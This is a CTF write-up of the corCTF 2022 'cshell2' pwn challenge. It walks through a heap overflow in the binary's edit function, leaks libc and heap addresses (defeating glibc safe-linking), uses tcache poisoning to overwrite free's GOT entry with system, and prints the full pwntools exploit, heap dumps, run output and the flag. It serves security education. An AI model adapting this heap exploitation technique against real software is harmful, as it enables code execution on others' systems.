Tags: heap heap-overflow tcache-poisoning 


## Introduction

`cshell2` is a heap challenge I did during the [corCTF 2022](https://ctftime.org/event/1656) event. It was pretty classic so I will not describe a lot.
If you begin with heap challenges, I advice you to read [previous heap writeup](https://ret2school.github.io/tags/heap/). Find all the tasks [here](https://github.com/ret2school/ctf/tree/master/2022/corCTF/pwn/cshell2).

## TL; DR

- Fill tcache.
- Heap overflow in `edit` on the `bio` field which allows to leak the address of the unsortedbin.
- Leak heap and defeat safe-linking to get an arbitrary write through tcache poisoning.
- Hiijack GOT entry of `free` to `system`.
- Call `free("/bin/sh")`.

## Reverse Engineering

Let's take a look at the provided binary and libc:
$ ./libc.so.6
GNU C Library (GNU libc) development release version 2.36.9000.
Copyright (C) 2022 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.
There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
Compiled by GNU CC version 12.1.0.
Minimum supported kernel: 3.2.0
For bug reporting instructions, please see:
$ checksec --file cshell2
[*] '/home/nasm/Documents/pwn/corCTF/cshell2/cshell2'
Arch: amd64-64-little
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x3fb000)

A very recent libc plus a non PIE-based binary without `FULL RELRO`. Thus we could think to some GOT hiijacking stuff directly on the binary. Let's take a look at the `add` function:
unsigned __int64 add()
int idx_1; // ebx
unsigned __int8 idx; // [rsp+Fh] [rbp-21h] BYREF
size_t size; // [rsp+10h] [rbp-20h] BYREF
unsigned __int64 v4; // [rsp+18h] [rbp-18h]

v4 = __readfsqword(0x28u);
puts("Enter index: ");
__isoc99_scanf("%hhu", &idx);
puts("Enter size (1032 minimum): ");
__isoc99_scanf("%lu", &size);
if ( idx > 0xEu || size <= 0x407 || size_array[2 * idx] )
puts("Error with either index or size...");
idx_1 = idx;
chunk_array[2 * idx_1] = (chunk_t *)malloc(size);
size_array[2 * idx] = size;
puts("Successfuly added!");
puts("Input firstname: ");
read(0, chunk_array[2 * idx], 8uLL);
puts("Input middlename: ");
read(0, chunk_array[2 * idx]->midName, 8uLL);
puts("Input lastname: ");
read(0, chunk_array[2 * idx]->lastName, 8uLL);
puts("Input age: ");
__isoc99_scanf("%lu", &chunk_array[2 * idx]->age);
puts("Input bio: ");
read(0, chunk_array[2 * idx]->bio, 0x100uLL);
return v4 - __readfsqword(0x28u);

It creates a chunk by asking several fields but nothing actually interesting there. Let's take a look at the `show` function:
unsigned __int64 show()
unsigned __int8 v1; // [rsp+7h] [rbp-9h] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);
puts("Enter index: ");
__isoc99_scanf("%hhu", &v1;;
if ( v1 <= 0xEu && size_array[2 * v1] )
"Name\n last: %s first: %s middle: %s age: %d\nbio: %s",
chunk_array[2 * v1]->lastName,
chunk_array[2 * v1]->firstName,
chunk_array[2 * v1]->midName,
chunk_array[2 * v1]->age,
chunk_array[2 * v1]->bio);
puts("Invalid index");
return v2 - __readfsqword(0x28u);
It prints a chunk only if it's allocated (size entry initialized in the size array) and if the index is right.
Then the `delete` function:
unsigned __int64 delete()
unsigned __int8 v1; // [rsp+7h] [rbp-9h] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);
printf("Enter index: ");
__isoc99_scanf("%hhu", &v1;;
if ( v1 <= 0xEu && size_array[2 * v1] )
free(chunk_array[2 * v1]);
size_array[2 * v1] = 0LL;
puts("Successfully Deleted!");
puts("Either index error or trying to delete something you shouldn't be...");
return v2 - __readfsqword(0x28u);
Quite common `delete` handler, it prevents double free.
The vulnerability is in the `edit` function:
unsigned __int64 edit()
unsigned __int8 idx; // [rsp+7h] [rbp-9h] BYREF
unsigned __int64 v2; // [rsp+8h] [rbp-8h]

v2 = __readfsqword(0x28u);
printf("Enter index: ");
__isoc99_scanf("%hhu", &idx);
if ( idx <= 0xEu && size_array[2 * idx] )
puts("Input firstname: ");
read(0, chunk_array[2 * idx], 8uLL);
puts("Input middlename: ");
read(0, chunk_array[2 * idx]->midName, 8uLL);
puts("Input lastname: ");
read(0, chunk_array[2 * idx]->lastName, 8uLL);
puts("Input age: ");
__isoc99_scanf("%lu", &chunk_array[2 * idx]->age);
printf("Input bio: (max %d)\n", size_array[2 * idx] - 32LL);
read(0, chunk_array[2 * idx]->bio, size_array[2 * idx] - 32LL);
puts("Successfully edit'd!");
return v2 - __readfsqword(0x28u);
It reads `size_array[2 * idx] - 32LL` bytes into a `0x100`-sized buffer which leads to a heap overflow.

## Exploitation

There is no actual issue, we can allocate whatever chunk bigger than `0x407`, the only fancy thing we have to do would be to defeat safe-linking to get an arbitrary write with a tcache poisoning attack on the `0x410` tcache bin. Here is the attack I led against the challenge but that's not the most optimized.

The plan is to:
- Allocate two `0x408`-sized chunks : pivot and victim, in order to easily get later libc leak.
- Allocate 9 more chunks and then fill the `0x410` tcachebin with them (with only 7 of them).
- Delete `victim` and overflow pivot up to the next free pointer of `victim` to get a libc leak.
- Allocate a `0x408`-sized chunk to get the `8`-th chunk (within `chunk_array`) which is on the top of the bin.
- Leak the heap same way as for libc, but we have to defeat safe-linking.
- Delete the `9`-th chunk to put it in the tcachebin at the first position.
- Then we can simply `edit` chunk `8` and overflow over chunk `9` to poison its next `fp` to hiijack it toward the GOT entry of `free`.
- Pop chunk `9` from the freelist and then request another the target memory area : the GOT entry of `free`.
- Write `system` into the GOT entry of `free`.
- Free whatever chunk for which `//bin/sh` is written at the right begin.

To understand the attack process I'll show the heap state at certain part of the attack.

## Libc / heap leak

First we have to fill the tcache. We allocate a chunk right after `chunk0` we do not put into the tcache to be able to put it in the unsortedbin to make appear unsortedbin's address:
add(0, 1032, b"//bin/sh\x00", b"", b"", 1337, b"") # pivot
add(1, 1032, b"", b"", b"", 1337, b"") # victim

for i in range(2, 7+2 + 2):
add(i, 1032, b"", b"", b"", 1337, b"")

for i in range(2, 7+2):

edit(0, b"", b"", b"", 1337, b"Y"*(1032 - 64 + 7))

io.recvuntil(b"Y"*(1032 - 64 + 7) + b"\n")
libc.address = pwn.u64(io.recvuntil(b"1 Add\n")[:-6].ljust(8, b"\x00")) - 0x1c7cc0
pwn.log.info(f"libc: {hex(libc.address)}")

# Heap state:
0x1de1290 0x0000000000000000 0x0000000000000411 ................ [chunk0]
0x1de12a0 0x68732f6e69622f0a 0x0000000000000a0a ./bin/sh........
0x1de12b0 0x000000000000000a 0x0000000000000539 ........9.......
0x1de12c0 0x0000000000000000 0x0000000000000000 ................
0x1de12d0 0x0000000000000000 0x0000000000000000 ................
0x1de12e0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de12f0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1300 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1310 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1320 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1330 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1340 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1350 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1360 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1370 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1380 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1390 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de13a0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de13b0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de13c0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de13d0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de13e0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de13f0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1400 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1410 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1420 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1430 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1440 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1450 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1460 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1470 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1480 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1490 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de14a0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de14b0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de14c0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de14d0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de14e0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de14f0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1500 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1510 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1520 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1530 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1540 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1550 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1560 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1570 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1580 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1590 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de15a0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de15b0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de15c0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de15d0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de15e0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de15f0 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1600 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1610 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1620 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1630 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1640 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1650 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1660 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1670 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1680 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de1690 0x5959595959595959 0x5959595959595959 YYYYYYYYYYYYYYYY
0x1de16a0 0x5959595959595959 0x0a59595959595959 YYYYYYYYYYYYYYY. <-- unsortedbin[all][0] [chunk1]
0x1de16b0 0x00007f34f64c3cc0 0x00007f34f64c3cc0 .<L.4....<L.4...

Then let's get a heap leak, we request back from the tcache the 8-th chunk, we free the `9`-th chunk that is allocated right after the `8`-th to be able to leak its next free pointer same way as for the libc previously. Plus we have to defeat safe-linking. To understand the defeat of safe-linking I advice you to read [this](https://www.researchinnovations.com/post/bypassing-the-upcoming-safe-linking-mitigation). It ends up to the `decrypt_pointer` function that makes use of known parts of the encrypted `fp` to decrypt the whole pointer. I didn't code the function by myself, too lazy for that, code comes from the [AeroCTF heap-2022 writeup](https://github.com/AeroCTF/aero-ctf-2022/blob/main/tasks/pwn/heap-2022/solution/sploit.py#L44).
def decrypt_pointer(leak: int) -> int:
parts = []

parts.append((leak >> 36) << 36)
parts.append((((leak >> 24) & 0xFFF) ^ (parts[0] >> 36)) << 24)
parts.append((((leak >> 12) & 0xFFF) ^ ((parts[1] >> 24) & 0xFFF)) << 12)

return parts[0] | parts[1] | parts[2]

add(11, 1032, b"", b"", b"", 1337, b"")

edit(11, b"", b"", b"", 1337, b"X"*(1032 - 64 + 7))

io.recvuntil(b"X"*(1032 - 64 + 7) + b"\n")
heap = decrypt_pointer(pwn.u64(io.recvuntil(b"1 Add\n")[:-6].ljust(8, b"\x00"))) - 0x1000
pwn.log.info(f"heap: {hex(heap)}")

# Heap state

0x13f6310 0x0000000000000000 0x0000000000000411 ................ [chunk8]
0x13f6320 0x00000000013f4c0a 0x000000000000000a .L?.............
0x13f6330 0x000000000000000a 0x0000000000000539 ........9.......
0x13f6340 0x0000000000000000 0x0000000000000000 ................
0x13f6350 0x0000000000000000 0x0000000000000000 ................
0x13f6360 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX [chun8->bio]
0x13f6370 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6380 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6390 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f63a0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f63b0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f63c0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f63d0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f63e0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f63f0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6400 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6410 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6420 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6430 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6440 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6450 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6460 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6470 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6480 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6490 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f64a0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f64b0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f64c0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f64d0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f64e0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f64f0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6500 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6510 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6520 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6530 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6540 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6550 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6560 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6570 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6580 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6590 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f65a0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f65b0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f65c0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f65d0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f65e0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f65f0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6600 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6610 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6620 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6630 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6640 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6650 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6660 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6670 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6680 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6690 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f66a0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f66b0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f66c0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f66d0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f66e0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f66f0 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6700 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6710 0x5858585858585858 0x5858585858585858 XXXXXXXXXXXXXXXX
0x13f6720 0x5858585858585858 0x0a58585858585858 XXXXXXXXXXXXXXX.
0x13f6730 0x00000000013f4ce6 0xdc8340f7dfc0b0e1 .L?..........@.. <-- tcachebins[0x410][0/7] [chunk9]


Then here we are, we leaked both libc and heap base addresses. We just have to to tcache poisoning on `free`.

## Tcache poisoning + PROFIT

We overflow the `8`-th chunk to overwrite the next freepointer of `chunk9` that is stored at the HEAD of the `0x410` tcachebin. Then we got an arbitrary write.
We craft a nice header to be able to request it back from the tcache, and we encrypt the `next` with the location of the `chunk9` to pass safe-linking checks.

Given we hiijack GOT we initialized properly some pointers around to avoid segfaults. We do not get a write into the GOT entry of `free` cause it is unaliagned and `malloc` needs `16` bytes aligned next free pointer.
edit(11, b"", b"", b"", 1337, b"X"*(1032 - 64) + pwn.p64(0x411) + pwn.p64(((heap + 0x2730) >> 12) ^ (exe.got.free - 0x8)))

# dumb
add(12, 1032, b"", b"", b"", 1337, b"")

io.sendlineafter(b"5 re-age user\n", b"1")
io.sendlineafter(b"index: \n", str(13).encode())
io.sendlineafter(b"Enter size (1032 minimum): \n", str(1032).encode())
io.sendafter(b"Input firstname: \n", pwn.p64(libc.address + 0xbbdf80))
io.sendafter(b"Input middlename: \n", pwn.p64(libc.sym.system))
io.sendafter(b"Input lastname: \n", pwn.p64(libc.address + 0x71ab0))
io.sendlineafter(b"Input age: \n", str(0).encode())
io.sendafter(b"Input bio: \n", pwn.p64(libc.address + 0x4cb40))

# Finally

io.sendline(b"cat flag.txt")
pwn.log.info(f"flag: {io.recvline()}")


Here we are:
nasm@off:~/Documents/pwn/corCTF/cshell2$ python3 exploit.py REMOTE HOST=be.ax PORT=31667
[*] '/home/nasm/Documents/pwn/corCTF/cshell2/cshell2'
Arch: amd64-64-little
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x3fb000)
[*] '/home/nasm/Documents/pwn/corCTF/cshell2/libc.so.6'
Arch: amd64-64-little
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to be.ax on port 31667: Done
[*] libc: 0x7f1d388db000
[*] heap: 0x665000
[*] flag: b'corctf{m0nk3y1ng_0n_4_d3bugg3r_15_th3_b35T!!!}\n'
[*] Switching to interactive mode

## Appendices

Final exploit:
#!/usr/bin/env python
# -*- coding: utf-8 -*-

# this exploit was generated via
# 1) pwntools
# 2) ctfmate

import os
import time
import pwn

# Set up pwntools for the correct architecture
exe = pwn.context.binary = pwn.ELF('cshell2')
libc = pwn.ELF("./libc.so.6")

pwn.context.delete_corefiles = True
pwn.context.rename_corefiles = False
pwn.context.timeout = 2000

host = pwn.args.HOST or ''
port = int(pwn.args.PORT or 1337)

def local(argv=[], *a, **kw):
'''Execute the target binary locally'''
if pwn.args.GDB:
return pwn.gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
return pwn.process([exe.path] + argv, *a, **kw)

def remote(argv=[], *a, **kw):
'''Connect to the process on the remote host'''
io = pwn.connect(host, port)
if pwn.args.GDB:
pwn.gdb.attach(io, gdbscript=gdbscript)
return io

def start(argv=[], *a, **kw):
'''Start the exploit against the target.'''
if pwn.args.LOCAL:
return local(argv, *a, **kw)
return remote(argv, *a, **kw)

gdbscript = '''

io = None

io = start()

def add(idx, size, firstname, midname, lastname, age, bio, l=True):
io.sendlineafter(b"5 re-age user\n", b"1")
io.sendlineafter(b"index: \n", str(idx).encode())
io.sendlineafter(b"Enter size (1032 minimum): \n", str(size).encode())
if l:
io.sendlineafter(b"Input firstname: \n", firstname)
io.sendlineafter(b"Input middlename: \n", midname)
io.sendlineafter(b"Input lastname: \n", lastname)
io.sendlineafter(b"Input age: \n", str(age).encode())
io.sendlineafter(b"Input bio: \n", bio)

io.sendafter(b"Input firstname: \n", firstname)
io.sendafter(b"Input middlename: \n", midname)
io.sendafter(b"Input lastname: \n", lastname)
io.sendafter(b"Input age: \n", str(age).encode())
io.sendafter(b"Input bio: \n", bio)

def show(idx):
io.sendlineafter(b"5 re-age user\n", b"2")
io.sendlineafter(b"index: ", str(idx).encode())

def delete(idx):
io.sendlineafter(b"5 re-age user\n", b"3")
io.sendlineafter(b"index: ", str(idx).encode())

def edit(idx, firstname, midname, lastname, age, bio):
io.sendlineafter(b"5 re-age user\n", b"4")
io.sendlineafter(b"index: ", str(idx).encode())

io.sendlineafter(b"Input firstname: \n", firstname)
io.sendlineafter(b"Input middlename: \n", midname)
io.sendlineafter(b"Input lastname: \n", lastname)
io.sendlineafter(b"Input age: \n", str(age).encode())
io.sendlineafter(b")\n", bio)

def decrypt_pointer(leak: int) -> int:
parts = []

parts.append((leak >> 36) << 36)
parts.append((((leak >> 24) & 0xFFF) ^ (parts[0] >> 36)) << 24)
parts.append((((leak >> 12) & 0xFFF) ^ ((parts[1] >> 24) & 0xFFF)) << 12)

return parts[0] | parts[1] | parts[2]

add(0, 1032, b"//bin/sh\x00", b"", b"", 1337, b"")
add(1, 1032, b"", b"", b"", 1337, b"")

for i in range(2, 7+2 + 2):
add(i, 1032, b"", b"", b"", 1337, b"")

for i in range(2, 7+2):

edit(0, b"", b"", b"", 1337, b"Y"*(1032 - 64 + 7))

io.recvuntil(b"Y"*(1032 - 64 + 7) + b"\n")
libc.address = pwn.u64(io.recvuntil(b"1 Add\n")[:-6].ljust(8, b"\x00")) - 0x1c7cc0
pwn.log.info(f"libc: {hex(libc.address)}")

add(11, 1032, b"", b"", b"", 1337, b"")


edit(11, b"", b"", b"", 1337, b"X"*(1032 - 64 + 7))

io.recvuntil(b"X"*(1032 - 64 + 7) + b"\n")
heap = decrypt_pointer(pwn.u64(io.recvuntil(b"1 Add\n")[:-6].ljust(8, b"\x00"))) - 0x1000
pwn.log.info(f"heap: {hex(heap)}")

environ = libc.address + 0xbe02f0

edit(11, b"", b"", b"", 1337, b"X"*(1032 - 64) + pwn.p64(0x411) + pwn.p64(((heap + 0x2730) >> 12) ^ (0x404010)))

# dumb
add(12, 1032, b"", b"", b"", 1337, b"")


io.sendlineafter(b"5 re-age user\n", b"1")
io.sendlineafter(b"index: \n", str(13).encode())
io.sendlineafter(b"Enter size (1032 minimum): \n", str(1032).encode())
io.sendafter(b"Input firstname: \n", pwn.p64(libc.address + 0xbbdf80))
io.sendafter(b"Input middlename: \n", pwn.p64(libc.sym.system))
io.sendafter(b"Input lastname: \n", pwn.p64(libc.address + 0x71ab0))
io.sendlineafter(b"Input age: \n", str(0).encode())
io.sendafter(b"Input bio: \n", pwn.p64(libc.address + 0x4cb40))

io.sendline(b"cat flag.txt")
pwn.log.info(f"flag: {io.recvline()}")


Original writeup (https://ret2school.github.io/post/cshell2/).